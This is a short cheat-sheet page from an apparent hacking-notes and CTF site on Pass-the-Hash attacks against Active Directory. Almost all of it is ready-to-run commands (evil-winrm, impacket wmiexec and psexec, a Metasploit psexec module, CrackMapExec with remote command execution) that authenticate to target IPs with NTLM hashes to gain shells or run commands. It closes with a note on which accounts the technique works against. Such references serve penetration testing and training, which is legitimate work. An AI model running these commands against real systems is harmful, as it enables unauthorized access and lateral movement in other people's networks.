>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Active Directory / Pass-the-Hash (PtH)

Pass-the-Hash (PtH)

Active Directory AD Attacks linux windows

evil-winrm

evil-winrm -u Administrator -H 37cb630168e5f82aafa8461e05c6bbd1 -i 10.130.126.152

impacket-wmiexec

impacket-wmiexec -hashes :37cb630168e5f82aafa8461e05c6bbd1 Administrator@10.130.126.152

impacket-psexec

impacket-psexec HALO/Administrator@10.130.126.152 -hashes :37cb630168e5f82aafa8461e05c6bbd1
rlwrap impacket-psexec HALO/Administrator@10.130.126.152 -hashes :37cb630168e5f82aafa8461e05c6bbd1

Metasploit psexec with hash

use exploit/windows/smb/psexec
set SMBDomain WORKGROUP
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:13e23qdadssadasdd1w1dw1wsd
set target Command
run

CrackMapExec PtH + command exec

crackmapexec smb 10.2.25.212 -u Administrator -H "adfsdffew32r23rsdfdfsfds"
crackmapexec smb 10.2.25.212 -u Administrator -H "adfsdffew32r23rsdfdfsfds" -x "ipconfig"

Limitation since 2014

PtH only works against the built-in local Administrator (RID 500) and domain accounts - not other local admin accounts.